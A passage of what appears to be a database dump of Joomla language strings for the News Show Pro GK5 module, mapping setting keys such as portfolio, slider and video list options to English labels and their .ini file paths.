page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3094,'NSP_PORTAL_MODE_VIDEO_GALLERY_TITLE_LIMIT_TYPE','Title limit type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3095,'NSP_PORTAL_MODE_VIDEO_GALLERY_TEXT_LIMIT_TYPE','Text limit type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3096,'NSP_PORTAL_MODE_VIDEO_GALLERY_TITLE_LIMIT','Title length','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3097,'NSP_PORTAL_MODE_VIDEO_GALLERY_TEXT_LIMIT','Text length','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3098,'NSP_PORTAL_MODE_VIDEO_GALLERY_AUTOANIMATION','Auto-animation interval','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3099,'COM_MODULES_NSP_PORTAL_MODE_VIDEOLIST_FIELDSET_LABEL','Video List - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3100,'MOD_NEWS_PRO_GK5_VIDEOLIST','Video List','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3101,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_LIST_POPUP','Video popup','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3102,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_LIST_POPUP_DESC','You can disable the video popup which is displayed when article contains a video in K2 component.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3103,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_LIST_POPUP_X','Popup width','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3104,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_LIST_POPUP_Y','Popup height','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3105,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_LIST_TITLE','Show title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3106,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_LIST_TITLE_DESC','You can disable the display of the title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3107,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_LIST_DATE','Show date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3108,'MOD_NEWS_PRO_GK5_PORTAL_MODE_VIDEO_LIST_DATE_DESC','You can disable the display of the date under the title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3109,'NSP_PORTAL_MODE_VIDEO_LIST_PAGES','Number of pages','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3110,'NSP_PORTAL_MODE_VIDEO_LIST_PAGES_DESC','Number of pages with articles.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3111,'NSP_PORTAL_MODE_VIDEO_LIST_PER_PAGE','Articles per page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3112,'NSP_PORTAL_MODE_VIDEO_LIST_ROWS','Number of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3113,'NSP_PORTAL_MODE_VIDEO_LIST_PER_PAGE_DESC','Number of articles displayed on one page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3114,'NSP_PORTAL_MODE_VIDEO_LIST_TITLE_LIMIT_TYPE','Title limit type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3115,'NSP_PORTAL_MODE_VIDEO_LIST_TITLE_LIMIT','Title length','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3116,'NSP_PORTAL_MODE_VIDEO_LIST_AUTOANIMATION','Auto-animation interval','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3117,'COM_MODULES_NSP_PORTAL_MODE_PORTFOLIO2_FIELDSET_LABEL','Portfolio II - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3118,'MOD_NEWS_PRO_GK5_PORTFOLIO2','Portfolio II','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3119,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3120,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_COLS_DESC','This option specify amount of news columns displayed in the portal mode per page.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3121,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_ROWS','Amount of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3122,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_ROWS_DESC','This option specify amount of news rows displayed in the portal mode per page.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3123,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_FILTER','Category filtering','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3124,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_FILTER_DESC','This option enables the category filtering in the portal mode','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3125,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_POPUP','Overlay popup','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3126,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_POPUP_DESC','This option enables the popup after clicking the item','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3127,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_ALL','All','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3128,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_CAT_TEXT','Category:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3129,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_AUTHOR_TEXT','Author:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3130,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO2_DATE_TEXT','Date:','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3131,'COM_MODULES_NSP_PORTAL_MODE_EVENTS_LIST_FIELDSET_LABEL','Events List - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3132,'MOD_NEWS_PRO_GK5_EVENTS_LIST','Events List','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3133,'MOD_NEWS_PRO_GK5_PORTAL_MODE_EVENTS_LIST_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3134,'MOD_NEWS_PRO_GK5_PORTAL_MODE_EVENTS_LIST_COLS_DESC','This option specify amount of news columns displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3135,'MOD_NEWS_PRO_GK5_PORTAL_MODE_EVENTS_LIST_ROWS','Amount of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3136,'MOD_NEWS_PRO_GK5_PORTAL_MODE_EVENTS_LIST_ROWS_DESC','This option specify amount of news rows displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3137,'MOD_NEWS_PRO_GK5_PORTAL_MODE_EVENTS_LIST_WHEN','When: ','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3138,'MOD_NEWS_PRO_GK5_PORTAL_MODE_EVENTS_LIST_NO_EVENTS','Currently there are no upcoming events.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3139,'COM_MODULES_NSP_PORTAL_MODE_JOMSOCIAL_PHOTOS_FIELDSET_LABEL','JomSocial Photos - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3140,'MOD_NEWS_PRO_GK5_JOMSOCIAL_PHOTOS','JomSocial Photos','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3141,'MOD_NEWS_PRO_GK5_PORTAL_MODE_JOMSOCIAL_PHOTOS_TOTAL','Total amount','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3142,'MOD_NEWS_PRO_GK5_PORTAL_MODE_JOMSOCIAL_PHOTOS_TOTAL_DESC','Total amount of displayed statuses','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3143,'MOD_NEWS_PRO_GK5_PORTAL_MODE_JOMSOCIAL_PHOTOS_AMOUNT','Amount for page','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3144,'MOD_NEWS_PRO_GK5_PORTAL_MODE_JOMSOCIAL_PHOTOS_AMOUNT_DESC','Amount of displayed statuses used to calculate the max-width percentage value for smaller screens','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3145,'MOD_NEWS_PRO_GK5_PORTAL_MODE_JOMSOCIAL_PHOTOS_WIDTH','Photo width','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3146,'MOD_NEWS_PRO_GK5_PORTAL_MODE_JOMSOCIAL_PHOTOS_WIDTH_DESC','Photo width - used for the bigger resolutions. For smaller screens the amount-based percentage value will be applied','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3147,'MOD_NEWS_PRO_GK5_PORTAL_MODE_JOMSOCIAL_PHOTOS_ANIMATION','Animation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3148,'MOD_NEWS_PRO_GK5_PORTAL_MODE_JOMSOCIAL_PHOTOS_MORE','Read more','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3149,'COM_MODULES_NSP_PORTAL_MODE_SPEAKERS_LIST_FIELDSET_LABEL','Speakers List - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3150,'MOD_NEWS_PRO_GK5_SPEAKERS_LIST','Speakers List','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3151,'MOD_NEWS_PRO_GK5_PORTAL_MODE_SPEAKERS_LIST_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3152,'MOD_NEWS_PRO_GK5_PORTAL_MODE_SPEAKERS_LIST_COLS_DESC','This option specify amount of news columns displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3153,'MOD_NEWS_PRO_GK5_PORTAL_MODE_SPEAKERS_LIST_ROWS','Amount of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3154,'MOD_NEWS_PRO_GK5_PORTAL_MODE_SPEAKERS_LIST_ROWS_DESC','This option specify amount of news rows displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3155,'COM_MODULES_NSP_PORTAL_MODE_GRID_NEWS_FIELDSET_LABEL','Grid News - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3156,'MOD_NEWS_PRO_GK5_GRID_NEWS','Grid News','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3157,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_COLS','Amount of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3158,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_COLS_DESC','This option specify amount of news columns displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3159,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_ROWS','Amount of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3160,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_ROWS_DESC','This option specify amount of news rows displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3161,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_DATE_FORMAT','Date format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3162,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_DATE_FORMAT_DESC','Specify the date format (like in the PHP date function). Leave it blank to hide the date block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3163,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_TITLE_LENGTH','Title length','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3164,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_TITLE_LENGTH_DESC','Specify the title length. You can hide the title by set this option to 0','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3165,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_TITLE_LENGTH_TYPE','Title length limit type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3166,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_TEXT_LENGTH','Text length','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3167,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_TEXT_LENGTH_DESC','Specify the text length. You can hide the text by set this option to 0','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3168,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_TEXT_LENGTH_TYPE','Text length limit type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3169,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_URL','More news URL','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3170,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_URL_DESC','You can set the URL for the link under the grid. Leave it blank to hide this link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3171,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_LINK_TEXT','More news label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3172,'MOD_NEWS_PRO_GK5_PORTAL_MODE_GRID_NEWS_LINK_TEXT_DESC','You can set the label for the link under the grid.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3173,'COM_MODULES_NSP_PORTAL_MODE_FRONTPAGE_IMAGE_OVERLAY_FIELDSET_LABEL','Frontpage Image Overlay - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3174,'MOD_NEWS_PRO_GK5_FRONTPAGE_IMAGE_OVERLAY','Frontpage Image Overlay','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3175,'MOD_NEWS_PRO_GK5_PORTAL_MODE_IMAGE_OVERLAY_TITLE','Show title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3176,'MOD_NEWS_PRO_GK5_PORTAL_MODE_IMAGE_OVERLAY_TEXT','Show text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3177,'MOD_NEWS_PRO_GK5_PORTAL_MODE_IMAGE_OVERLAY_TEXT_LIMIT','Text chars limit','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3178,'MOD_NEWS_PRO_GK5_PORTAL_MODE_IMAGE_OVERLAY_READON','Show readmore','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3179,'MOD_NEWS_PRO_GK5_PORTAL_MODE_IMAGE_OVERLAY_READON_TEXT','Readmore text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3180,'MOD_NEWS_PRO_GK5_PORTAL_MODE_IMAGE_OVERLAY_READON_TEXT_LABEL','Read more','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3181,'COM_MODULES_NSP_PORTAL_MODE_PORTFOLIO_GRID_FIELDSET_LABEL','Portfolio Grid - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3182,'MOD_NEWS_PRO_GK5_PORTFOLIO_GRID','Portfolio Grid','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3183,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_AMOUNT','Number of articles','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3184,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_COLS','Number of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3185,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_COLS_SMALL_DESKTOP','Number of columns (< 1920px)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3186,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_COLS_TABLET','Number of columns (< 1280px)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3187,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_COLS_SMALL_TABLET','Number of columns (< 800px)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3188,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_COLS_MOBILE','Number of columns (< 480px)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3189,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_TITLE_LENGTH','Title length','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3190,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_TITLE_LENGTH_TYPE','Title length type','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3191,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_DATE_FORMAT','Date format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3192,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_AUTHOR','Show author','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3193,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_OVERLAY','Enable overlay','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3194,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_POPUP','Enable popup','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3195,'MOD_NEWS_PRO_GK5_PORTAL_MODE_PORTFOLIO_GRID_TITLE_LINK','Enable title link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3196,'COM_MODULES_NSP_PORTAL_MODE_NEWS_SLIDER_FIELDSET_LABEL','News Slider - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3197,'MOD_NEWS_PRO_GK5_NEWS_SLIDER','News Slider','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3198,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_AMOUNT','News amount','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3199,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_AMOUNT_DESC','Minimal amount for this portal mode is 5','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3200,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_TITLE','Show title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3201,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_TITLE_DESC','Enable/disable showing of the title','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3202,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_TEXT','Show text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3203,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_TEXT_DESC','Enable/disable showing of the text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3204,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_DATE','Show date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3205,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_DATE_DESC','Enable/disable showing of the date','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3206,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_DATE_FORMAT','Date format','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3207,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_DATE_FORMAT_DESC','Format used in the date field - the same format style as in the info block','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3208,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_AUTOANIMATION_TIME','Autoanimation interval','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3209,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_AUTOANIMATION_TIME_DESC','Time between sliding animation in ms','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3210,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_IMAGE_MARGIN','Small image margin','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3211,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_IMAGE_MARGIN_DESC','This margin will be used to decrease the original image size','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3212,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_LABEL','Label of the module','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3213,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_CATEGORY_LABEL','Category link label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3214,'MOD_NEWS_PRO_GK5_PORTAL_MODE_NEWS_SLIDER_CATEGORY_LABEL_DESC','Leave it blank to hide the category link','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3215,'COM_MODULES_NSP_PORTAL_MODE_BIKESTORE_SLIDER_FIELDSET_LABEL','Bikestore Slider - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3216,'MOD_NEWS_PRO_GK5_BIKESTORE_SLIDER','Bikestore Slider','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3217,'MOD_NEWS_PRO_GK5_PORTAL_MODE_BIKESTORE_SLIDER_AMOUNT','Article amount','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3218,'MOD_NEWS_PRO_GK5_PORTAL_MODE_BIKESTORE_SLIDER_SPEED','Auto-Animation interval (ms)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3219,'MOD_NEWS_PRO_GK5_PORTAL_MODE_BIKESTORE_SLIDER_AUTOANIM','Auto-animation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3220,'COM_MODULES_NSP_PORTAL_MODE_TECHNEWS_HEADER1_FIELDSET_LABEL','TechNews Header I - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3221,'MOD_NEWS_PRO_GK5_TECHNEWS_HEADER1','TechNews - Header I','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3222,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_HEADER1_COLS','Number of columns','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3223,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_HEADER1_COLS_DESC','Maximal number of columns is 5 when minimum is 3','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3224,'COM_MODULES_NSP_PORTAL_MODE_TECHNEWS_HEADER2_FIELDSET_LABEL','TechNews Header II - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3225,'MOD_NEWS_PRO_GK5_TECHNEWS_HEADER2','TechNews - Header II','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3226,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_HEADER2_LAYOUT','Columns layout','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3227,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_HEADER2_MAIN_COL_COL','Photo - Column - Column','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3228,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_HEADER2_COL_MAIN_COL','Column - Photo - Column','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3229,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_HEADER2_COL_COL_MAIN','Column - Column - Photo','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3230,'COM_MODULES_NSP_PORTAL_MODE_TECHNEWS_RATING_FIELDSET_LABEL','TechNews Rating - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3231,'MOD_NEWS_PRO_GK5_TECHNEWS_RATING','TechNews - Rating','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3232,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_RATING_ROWS','Number of rows','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3233,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_RATING_ROWS_DESC','Number of rows displayed in the portal mode.','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3234,'MOD_NEWS_PRO_GK5_TECHNEWS_RATING_BY','By','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3235,'COM_MODULES_NSP_PORTAL_MODE_TECHNEWS_REVIEWS_FIELDSET_LABEL','TechNews Reviews - Portal Mode Settings','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3236,'MOD_NEWS_PRO_GK5_TECHNEWS_REVIEWS','TechNews - Reviews','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3237,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_REVIEWS_ITEMS','Number of items','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3238,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_REVIEWS_INTRO','Intro text','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3239,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_REVIEWS_BTN','Button label','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3240,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_REVIEWS_AUTOANIM','Auto-animation','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3241,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_REVIEWS_INTERVAL','Auto-animation interval (ms)','/home/smthsmth/public_html/language/en-GB/en-GB.mod_news_pro_gk5.ini'),(3242,'MOD_NEWS_PRO_GK5_PORTAL_MODE_TECHNEWS_REVIEWS_BTN_URL','Button 